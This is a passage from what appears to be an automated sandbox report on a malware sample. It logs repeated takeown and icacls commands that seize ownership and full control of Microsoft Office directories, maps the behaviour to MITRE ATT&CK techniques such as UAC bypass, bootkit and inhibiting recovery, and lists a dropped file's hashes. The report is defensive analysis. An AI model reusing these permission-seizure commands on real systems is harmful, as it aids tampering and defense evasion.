  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ro" /grant Administrators:F
  2⤵
  PID:2228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ru" /a
  2⤵
  PID:2548
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ru" /grant Administrators:F
  2⤵
  PID:1372
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sk" /a
  2⤵
  PID:5024
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sk" /grant Administrators:F
  2⤵
  PID:3296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl" /a
  2⤵
  PID:2248
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl" /grant Administrators:F
  2⤵
  PID:4512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-BA" /a
  2⤵
  PID:2676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-BA" /grant Administrators:F
  2⤵
  PID:4256
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2548
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-RS" /a
  2⤵
  PID:2228
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-RS" /grant Administrators:F
  2⤵
  PID:3904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Latn-RS" /a
  2⤵
  PID:1256
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Latn-RS" /grant Administrators:F
  2⤵
  PID:4400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv" /a
  2⤵
  PID:1944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv" /grant Administrators:F
  2⤵
  PID:4256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\th" /a
  2⤵
  PID:4400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\th" /grant Administrators:F
  2⤵
  PID:3972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\tr" /a
  2⤵
  PID:5000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\tr" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\uk" /a
  2⤵
  PID:1492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\uk" /grant Administrators:F
  2⤵
  PID:3840
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\vi" /a
  2⤵
  PID:2676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\vi" /grant Administrators:F
  2⤵
  PID:3460
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\zh-CN" /a
  2⤵
  PID:4864
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\zh-CN" /grant Administrators:F
  2⤵
  PID:2228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\MSIPC\zh-TW" /a
  2⤵
  PID:3776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\zh-TW" /grant Administrators:F
  2⤵
  PID:2676
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers" /a
  2⤵
  PID:3296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers" /grant Administrators:F
  2⤵
  PID:1372
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3168
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift" /grant Administrators:F
  2⤵
  PID:936
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib" /a
  2⤵
  PID:724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib" /grant Administrators:F
  2⤵
  PID:4864
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA" /a
  2⤵
  PID:4256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA" /grant Administrators:F
  2⤵
  PID:3840
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce" /a
  2⤵
  PID:2448
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce" /grant Administrators:F
  2⤵
  PID:3296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib" /a
  2⤵
  PID:5024
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib" /grant Administrators:F
  2⤵
  PID:5132
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033" /a
  2⤵
  PID:5180
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033" /grant Administrators:F
  2⤵
  PID:5228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA" /a
  2⤵
  PID:5300
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA" /grant Administrators:F
  2⤵
  PID:5356
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA" /a
  2⤵
  PID:5412
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA" /grant Administrators:F
  2⤵
  PID:5464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA" /a
  2⤵
  PID:5520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA" /grant Administrators:F
  2⤵
  PID:5572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\OneNote" /a
  2⤵
  PID:5632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\OneNote" /grant Administrators:F
  2⤵
  PID:5688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\osfFPA" /a
  2⤵
  PID:5736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\osfFPA" /grant Administrators:F
  2⤵
  PID:5792
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE" /a
  2⤵
  PID:5848
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE" /grant Administrators:F
  2⤵
  PID:5896
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\PersonaSpy" /a
  2⤵
  PID:5944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\PersonaSpy" /grant Administrators:F
  2⤵
  PID:5996
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\PROOF" /a
  2⤵
  PID:6044
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\PROOF" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:6112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\QUERIES" /a
  2⤵
  PID:5172
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\QUERIES" /grant Administrators:F
  2⤵
  PID:5160
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\SAMPLES" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5264
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\SAMPLES" /grant Administrators:F
  2⤵
  PID:5348
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs" /a
  2⤵
  PID:5404
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs" /grant Administrators:F
  2⤵
  PID:5428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018" /a
  2⤵
  PID:5480
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018" /grant Administrators:F
  2⤵
  PID:5592
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview" /a
  2⤵
  PID:5572
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5636
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib" /a
  2⤵
  PID:5716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib" /grant Administrators:F
  2⤵
  PID:5740
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common" /a
  2⤵
  PID:5796
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common" /grant Administrators:F
  2⤵
  PID:5884
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets" /a
  2⤵
  PID:5792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets" /grant Administrators:F
  2⤵
  PID:5964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027" /a
  2⤵
  PID:6032
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027" /grant Administrators:F
  2⤵
  PID:6060
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets" /a
  2⤵
  PID:6128
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5024
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons" /a
  2⤵
  PID:5148
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons" /grant Administrators:F
  2⤵
  PID:5284
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042" /a
  2⤵
  PID:5332
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042" /grant Administrators:F
  2⤵
  PID:5364
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets" /a
  2⤵
  PID:5160
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets" /grant Administrators:F
  2⤵
  PID:5476
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets" /a
  2⤵
  PID:5588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets" /grant Administrators:F
  2⤵
  PID:5652
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images" /a
  2⤵
  PID:5504
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images" /grant Administrators:F
  2⤵
  PID:5696
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049" /a
  2⤵
  PID:5776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049" /grant Administrators:F
  2⤵
  PID:5908
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\SkypeSrv" /a
  2⤵
  PID:5912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\SkypeSrv" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5980
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE" /a
  2⤵
  PID:6000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE" /grant Administrators:F
  2⤵
  PID:6108
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\STARTUP" /a
  2⤵
  PID:5192
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\STARTUP" /grant Administrators:F
  2⤵
  PID:5964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Office16\XLSTART" /a
  2⤵
  PID:5184
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Office16\XLSTART" /grant Administrators:F
  2⤵
  PID:5304
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\rsod" /a
  2⤵
  - Modifies file permissions
  PID:5448
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\rsod" /grant Administrators:F
  2⤵
  PID:5148
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Templates" /a
  2⤵
  PID:5152
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Templates" /grant Administrators:F
  2⤵
  PID:5564
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Templates\1033" /a
  2⤵
  PID:5356
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Templates\1033" /grant Administrators:F
  2⤵
  PID:5668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16" /a
  2⤵
  PID:5632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16" /grant Administrators:F
  2⤵
  PID:5768
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE" /a
  2⤵
  PID:5724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE" /grant Administrators:F
  2⤵
  PID:5828
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16" /a
  2⤵
  PID:5928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16" /grant Administrators:F
  2⤵
  PID:5924
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery" /a
  2⤵
  PID:5980
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery" /grant Administrators:F
  2⤵
  PID:6092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Templates\Presentation Designs" /a
  2⤵
  PID:5164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Templates\Presentation Designs" /grant Administrators:F
  2⤵
  PID:5156
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs" /a
  2⤵
  PID:6052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs" /grant Administrators:F
  2⤵
  PID:5228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\Common AppData" /a
  2⤵
  PID:3620
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\Common AppData" /grant Administrators:F
  2⤵
  PID:4420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft" /a
  2⤵
  PID:5380
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft" /grant Administrators:F
  2⤵
  PID:5596
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE" /a
  2⤵
  PID:5216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE" /grant Administrators:F
  2⤵
  PID:5464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat" /a
  2⤵
  PID:4592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat" /grant Administrators:F
  2⤵
  PID:5744
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help" /a
  2⤵
  PID:5824
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help" /grant Administrators:F
  2⤵
  PID:5776
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\Fonts" /a
  2⤵
  PID:5948
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\Fonts" /grant Administrators:F
  2⤵
  PID:5844
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\Fonts\private" /a
  2⤵
  PID:6048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\Fonts\private" /grant Administrators:F
  2⤵
  PID:6032
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64" /a
  2⤵
  PID:5932
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64" /grant Administrators:F
  2⤵
  PID:5204
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\DESIGNER" /a
  2⤵
  PID:5360
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\DESIGNER" /grant Administrators:F
  2⤵
  PID:5364
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared" /a
  2⤵
  PID:3620
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW" /a
  2⤵
  PID:1256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW" /grant Administrators:F
  2⤵
  PID:5312
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" /a
  2⤵
  PID:5532
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" /grant Administrators:F
  2⤵
  PID:5648
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION" /a
  2⤵
  PID:5984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION" /grant Administrators:F
  2⤵
  PID:5892
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033" /a
  2⤵
  PID:2548
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033" /grant Administrators:F
  2⤵
  PID:6140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EURO" /a
  2⤵
  PID:4592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EURO" /grant Administrators:F
  2⤵
  PID:6096
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters" /a
  2⤵
  PID:6124
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters" /grant Administrators:F
  2⤵
  PID:5200

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4524

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2ec 0x498
1⤵
PID:3176

C:\Windows\system32\usoclient.exe
C:\Windows\system32\usoclient.exe StartScan
1⤵
PID:5052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\MSInfo\159254014

Filesize
424KB

MD5
e98132129444e3c04a8068fb7991503b

SHA1
cd18bc6770e54e81395e8d2037bdd37aecf87fff

